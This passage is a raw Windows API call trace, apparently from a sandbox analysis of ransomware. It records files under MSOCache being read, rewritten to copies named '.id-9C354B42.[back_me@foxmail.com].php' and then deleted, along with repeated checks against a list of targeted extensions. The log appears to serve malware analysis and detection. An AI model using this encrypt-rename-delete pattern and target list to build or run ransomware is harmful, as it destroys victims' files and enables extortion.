hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.312] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.312] GetLastError () returned 0x0 [0035.312] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x391, lpOverlapped=0x0) returned 1 [0035.314] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0035.314] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.315] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.315] SetEndOfFile (hFile=0x1a4) returned 1 [0035.315] CloseHandle (hObject=0x1a4) returned 1 [0035.315] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.315] SetEndOfFile (hFile=0x1a8) returned 1 [0035.316] CloseHandle (hObject=0x1a8) returned 1 [0035.316] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.316] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.317] lstrlenW (lpString=".doc") returned 4 [0035.317] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".docx") returned 5 [0035.317] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.317] lstrlenW (lpString=".pdf") returned 4 [0035.317] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".xls") returned 4 [0035.317] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".xlsx") returned 5 [0035.317] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.317] lstrlenW (lpString=".ppt") returned 4 [0035.317] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.317] lstrlenW (lpString=".zip") returned 4 [0035.317] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.317] lstrlenW (lpString=".rar") returned 4 [0035.317] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".bz2") returned 4 [0035.317] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".7z") returned 3 [0035.317] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.317] lstrlenW (lpString=".dbf") returned 4 [0035.317] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.317] lstrlenW (lpString=".1cd") returned 4 [0035.317] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.318] lstrlenW (lpString=".jpg") returned 4 [0035.318] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.318] lstrlenW (lpString=".doc") returned 4 [0035.318] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".docx") returned 5 [0035.318] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.318] lstrlenW (lpString=".pdf") returned 4 [0035.318] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".xls") returned 4 [0035.318] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".xlsx") returned 5 [0035.318] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.318] lstrlenW (lpString=".ppt") returned 4 [0035.318] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.318] lstrlenW (lpString=".zip") returned 4 [0035.318] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.318] lstrlenW (lpString=".rar") returned 4 [0035.318] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".bz2") returned 4 [0035.318] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".7z") returned 3 [0035.318] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.318] lstrlenW (lpString=".dbf") returned 4 [0035.318] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.318] lstrlenW (lpString=".1cd") returned 4 [0035.319] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0035.319] lstrlenW (lpString=".jpg") returned 4 [0035.319] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.319] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.319] lstrlenW (lpString="Setup.xml") returned 9 [0035.319] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.319] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1452) returned 1 [0035.319] CloseHandle (hObject=0x1a8) returned 1 [0035.319] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.319] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.319] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.319] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.320] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.320] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.320] GetLastError () returned 0x0 [0035.320] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0035.461] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.462] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.462] SetEndOfFile (hFile=0x1a4) returned 1 [0035.462] CloseHandle (hObject=0x1a4) returned 1 [0035.463] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.463] SetEndOfFile (hFile=0x1a8) returned 1 [0035.464] CloseHandle (hObject=0x1a8) returned 1 [0035.464] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.464] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.464] lstrlenW (lpString=".doc") returned 4 [0035.464] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.464] lstrlenW (lpString=".docx") returned 5 [0035.464] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.464] lstrlenW (lpString=".pdf") returned 4 [0035.464] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.464] lstrlenW (lpString=".xls") returned 4 [0035.464] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.464] lstrlenW (lpString=".xlsx") returned 5 [0035.464] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.464] lstrlenW (lpString=".ppt") returned 4 [0035.464] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString=".zip") returned 4 [0035.465] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.465] lstrlenW (lpString=".rar") returned 4 [0035.465] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString=".bz2") returned 4 [0035.465] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString=".7z") returned 3 [0035.465] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString=".dbf") returned 4 [0035.465] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString=".1cd") returned 4 [0035.465] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString=".jpg") returned 4 [0035.465] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString=".doc") returned 4 [0035.465] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString=".docx") returned 5 [0035.465] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.465] lstrlenW (lpString=".pdf") returned 4 [0035.465] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString=".xls") returned 4 [0035.465] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString=".xlsx") returned 5 [0035.465] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.465] lstrlenW (lpString=".ppt") returned 4 [0035.465] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.465] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.465] lstrlenW (lpString=".zip") returned 4 [0035.466] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.466] lstrlenW (lpString=".rar") returned 4 [0035.466] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.466] lstrlenW (lpString=".bz2") returned 4 [0035.466] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.466] lstrlenW (lpString=".7z") returned 3 [0035.466] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.466] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.466] lstrlenW (lpString=".dbf") returned 4 [0035.466] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.466] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.466] lstrlenW (lpString=".1cd") returned 4 [0035.466] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.466] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.466] lstrlenW (lpString=".jpg") returned 4 [0035.466] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.466] lstrcmpiW (lpString1=".chm", lpString2=".php") returned -1 [0035.466] lstrlenW (lpString="pss10r.chm") returned 10 [0035.466] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.320] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=27195) returned 1 [0036.320] CloseHandle (hObject=0x1a0) returned 1 [0036.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020 [0036.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.320] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.320] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.320] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.321] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0036.321] GetLastError () returned 0x0 [0036.321] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0036.481] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0036.482] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.482] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0036.492] SetEndOfFile (hFile=0x198) returned 1 [0036.497] CloseHandle (hObject=0x198) returned 1 [0036.509] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.511] SetEndOfFile (hFile=0x1a0) returned 1 [0036.527] CloseHandle (hObject=0x1a0) returned 1 [0036.527] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.528] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1 [0036.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.528] lstrlenW (lpString=".doc") returned 4 [0036.528] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString=".docx") returned 5 [0036.528] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0036.528] lstrlenW (lpString=".pdf") returned 4 [0036.528] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString=".xls") returned 4 [0036.528] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString=".xlsx") returned 5 [0036.528] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0036.528] lstrlenW (lpString=".ppt") returned 4 [0036.528] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.528] lstrlenW (lpString=".zip") returned 4 [0036.528] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString=".rar") returned 4 [0036.528] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString=".bz2") returned 4 [0036.528] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.528] lstrlenW (lpString=".7z") returned 3 [0036.528] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.528] lstrlenW (lpString=".dbf") returned 4 [0036.528] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.528] lstrlenW (lpString=".1cd") returned 4 [0036.529] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString=".jpg") returned 4 [0036.529] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString=".doc") returned 4 [0036.529] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString=".docx") returned 5 [0036.529] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0036.529] lstrlenW (lpString=".pdf") returned 4 [0036.529] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString=".xls") returned 4 [0036.529] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString=".xlsx") returned 5 [0036.529] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0036.529] lstrlenW (lpString=".ppt") returned 4 [0036.529] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString=".zip") returned 4 [0036.529] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString=".rar") returned 4 [0036.529] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString=".bz2") returned 4 [0036.529] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.529] lstrlenW (lpString=".7z") returned 3 [0036.529] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString=".dbf") returned 4 [0036.529] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString=".1cd") returned 4 [0036.529] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.529] lstrlenW (lpString=".jpg") returned 4 [0036.530] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.530] lstrcmpiW (lpString1=".chm", lpString2=".php") returned -1 [0036.530] lstrlenW (lpString="setup.chm") returned 9 [0036.530] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.530] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=67190) returned 1 [0036.530] CloseHandle (hObject=0x1a0) returned 1 [0036.530] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020 [0036.530] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.530] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 